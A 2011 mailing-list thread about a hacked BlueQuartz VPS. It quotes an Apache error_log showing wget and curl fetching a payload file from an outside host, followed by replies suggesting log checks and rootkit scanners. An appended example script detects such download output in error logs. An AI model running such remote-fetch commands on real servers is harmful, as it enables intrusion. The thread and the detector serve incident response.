[BlueOnyx:08820] Re: vps hacked

Steffan general at ziggo.nl
Thu Oct 13 09:04:51 -05 2011


I have looked in secure
Used last
Nothing
No siteadmin logins

Looks like they found a hole in some site, I have no idea



-----Original message-----
From: blueonyx-bounces at mail.blueonyx.it
[mailto:blueonyx-bounces at mail.blueonyx.it] On behalf of Mike's List
Sent: Thursday, 13 October 2011 15:29
To: BlueOnyx General Mailing List
Subject: [BlueOnyx:08818] Re: vps hacked


Have you looked at /var/log/secure?  Use the "last" command to see if there
were any suspicious logins via shell (you might have to unzip the older wtmp
file/s for previous logins).  Is there a log for GUI logins also that you can
track?

Run rkhunter and chkrootkit to check for rootkit installation?  Install ClamAV,
Sophos, etc. for malware/antivirus scanning?  RPMs for rkhunter and
chkrootkit can be found below; download the appropriate version for your
OS version, then "rpm -ivh <package.rpm>" and run "rkhunter -c" and/or
"chkrootkit" to start scanning.

http://pkgs.repoforge.org/rkhunter/
http://pkgs.repoforge.org/chkrootkit/


Mike


On Thu, 13 Oct 2011, Steffan wrote:

> 
> I still have a client with a BlueQuartz server (vps)
> 
>  
> 
> This morning the virtual server was hacked
> 
> I looked in the logs and found this in /var/log/httpd/error_log
> 
>  
> 
>  
> 
>  
> 
> [Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
> 
> --00:07:40--  http://rapha.altervista.org/prv.txt
> 
>            => `prv.txt'
> 
> Resolving rapha.altervista.org... 46.4.65.68
> 
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> 
> HTTP request sent, awaiting response... 200 OK
> 
> Length: 28,039 (27K) [text/plain]
> 
>  
> 
>     0K .......... .......... .......                         100% 1015.53 KB/s
> 
>  
> 
> 00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
> 
>  
> 
> sh: line 1: lwp-downlod: command not found
> 
> sh: line 1: fetch: command not found
> 
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> 
>   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
> 
>                                  Dload  Upload   Total   Spent    Left  Speed
> 
> ^M 14 28039   14  4097    0     0  98324      0 --:--:-- --:--:-- --:--:-- 98324^M100 28039  100 28039    0     0   403k      0 --:--:-- --:--:-- --:--:--  899k
> 
> sh: line 3: prv.txt: command not found
> 
> --00:07:40--  http://rapha.altervista.org/prv.txt
> 
>            => `prv.txt'
> 
> Resolving rapha.altervista.org... 46.4.65.68
> 
> Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
> 
> HTTP request sent, awaiting response... 200 OK
> 
> Length: 28,039 (27K) [text/plain]
> 
>  
> 
>     0K .......... .......... .......                         100% 1020.34 KB/s
> 
>  
> 
> 00:07:40 (1020.34 KB/s) - `prv.txt' saved [28039/28039]
> 
>  
> 
> sh: line 1: lwp-downlod: command not found
> 
> sh: line 1: fetch: command not found
> 
> sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
> 
>   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
> 
>                                  Dload  Upload   Total   Spent    Left  Speed
> 
> ^M  4 28039    4  1201    0     0  42493      0 --:--:-- --:--:-- --:--:-- 42493^M100 28039  100 28039    0     0   507k      0 --:--:-- --:--:-- --:--:-- 1048k
> 
> sh: line 3: prv.txt: command not found
> 
>  
> 
> I don't see any admin logins
> 
> How can I find out what happened?
> I don't see anything weird in the access log or message log
> 
>  
> 
> Thanks, Steffan
> 
> 
>
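A defender-side triage helper, added here as an example; it is not part of this thread or of the BlueOnyx project. The error_log excerpt quoted above contains wget banners ("--00:07:40--  http://...", "`prv.txt' saved [28039/28039]"), a bare curl progress header ("% Total    % Received ...") and "sh: line N: ...: command not found" messages. None of those are Apache messages: they are the stdout/stderr of commands run by a child of the web server, which is what lands in error_log when a web application executes attacker-supplied commands. The script below scans an error_log for exactly that signature, collects the URLs and saved files involved, and notes which "[client x.x.x.x]" entry immediately precedes each hit. The sample log is constructed from the lines quoted in this thread plus one benign, made-up entry (10.0.0.5); the regexes and the "nearest preceding client IP" heuristic are this example's own assumptions, not something the thread or Apache provides.

```python
"""Triage an Apache error_log for output of shell tools spawned by the web server.

Added example, not code from the BlueOnyx thread.  Detects:
  - wget download banners and "saved [got/total]" completion lines
  - curl's progress-meter header
  - "sh: line N: <cmd>: command not found" / "No such file or directory"
"""
import re
from collections import Counter

# Regular expressions are this example's assumptions, tuned to wget 1.x,
# curl and bash/sh message formats as they appear in the quoted log.
SHELL_ERROR = re.compile(
    r"^sh: line (?P<n>\d+): (?P<cmd>[^:]+): "
    r"(?P<kind>command not found|No such file or directory)")
WGET_BANNER = re.compile(r"^--\d\d:\d\d:\d\d--\s+(?P<url>\S+)")
WGET_SAVED = re.compile(
    r"^\d\d:\d\d:\d\d .*?- `(?P<file>[^']+)' saved \[(?P<got>\d+)/(?P<total>\d+)\]")
CURL_PROGRESS = re.compile(r"^\s*% Total\s+% Received\s+% Xferd")
APACHE_ENTRY = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[0-9a-fA-F.:]+)\]")

# Constructed sample: the attacker-related lines are taken from the log quoted
# in the thread; the final 10.0.0.5 line is a made-up benign entry.
SAMPLE_LOG = """\
[Wed Oct 12 00:07:13 2011] [error] [client 220.181.125.72] no acceptable variant: /usr/sausalito/ui/web/error/fileNotFound.html
--00:07:40--  http://rapha.altervista.org/prv.txt
           => `prv.txt'
Resolving rapha.altervista.org... 46.4.65.68
Connecting to rapha.altervista.org|46.4.65.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 28,039 (27K) [text/plain]
00:07:40 (1015.53 KB/s) - `prv.txt' saved [28039/28039]
sh: line 1: lwp-downlod: command not found
sh: line 1: fetch: command not found
sh: line 2: rapha.altervista.org/prv.txt: No such file or directory
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
sh: line 3: prv.txt: command not found
[Wed Oct 12 00:09:01 2011] [error] [client 10.0.0.5] File does not exist: /home/sites/site1/web/favicon.ico
"""


def triage_error_log(text):
    """Return a dict of indicators found in error_log text.

    Lines written by spawned commands carry no client IP, so each hit is
    attributed to the nearest *preceding* Apache "[client ...]" entry.  That
    is an adjacency heuristic only: Apache children write to the same log
    concurrently, so treat "nearby_client_ips" as a lead, not as proof.
    """
    findings = {
        "download_urls": [],      # URLs named in wget banners
        "saved_files": [],        # (filename, bytes_got, bytes_total)
        "shell_errors": [],       # (command, kind) from "sh: line N:" lines
        "curl_invocations": 0,    # curl progress headers seen
        "flagged_lines": [],      # 1-based line numbers of every hit
        "client_ips": Counter(),  # all IPs in regular Apache entries
        "nearby_client_ips": Counter(),  # IP of the entry preceding each hit
    }
    last_client_ip = None
    for lineno, line in enumerate(text.splitlines(), 1):
        m = APACHE_ENTRY.match(line)
        if m:  # ordinary Apache entry: remember the client, nothing to flag
            last_client_ip = m.group("ip")
            findings["client_ips"][last_client_ip] += 1
            continue
        flagged = False
        m = WGET_BANNER.match(line)
        if m:
            findings["download_urls"].append(m.group("url"))
            flagged = True
        m = WGET_SAVED.match(line)
        if m:
            findings["saved_files"].append(
                (m.group("file"), int(m.group("got")), int(m.group("total"))))
            flagged = True
        m = SHELL_ERROR.match(line)
        if m:
            findings["shell_errors"].append((m.group("cmd"), m.group("kind")))
            flagged = True
        if CURL_PROGRESS.match(line):
            findings["curl_invocations"] += 1
            flagged = True
        if flagged:
            findings["flagged_lines"].append(lineno)
            if last_client_ip:
                findings["nearby_client_ips"][last_client_ip] += 1
    return findings


def is_compromise_indicator(findings):
    """True when any shell-tool output was found in the web server's error log."""
    return bool(findings["flagged_lines"])


if __name__ == "__main__":
    result = triage_error_log(SAMPLE_LOG)
    for key, value in result.items():
        print(f"{key}: {value}")
    print("indicator of command execution:", is_compromise_indicator(result))
```

Run it against a real log with `triage_error_log(open("/var/log/httpd/error_log").read())`. The URLs and saved filenames tell you what to look for on disk (and in /tmp, /var/tmp and the web writable directories), while the flagged line numbers give the time window to compare against access_log and wtmp; the "command not found" lines are useful too, since the web server's user evidently could run a shell at all.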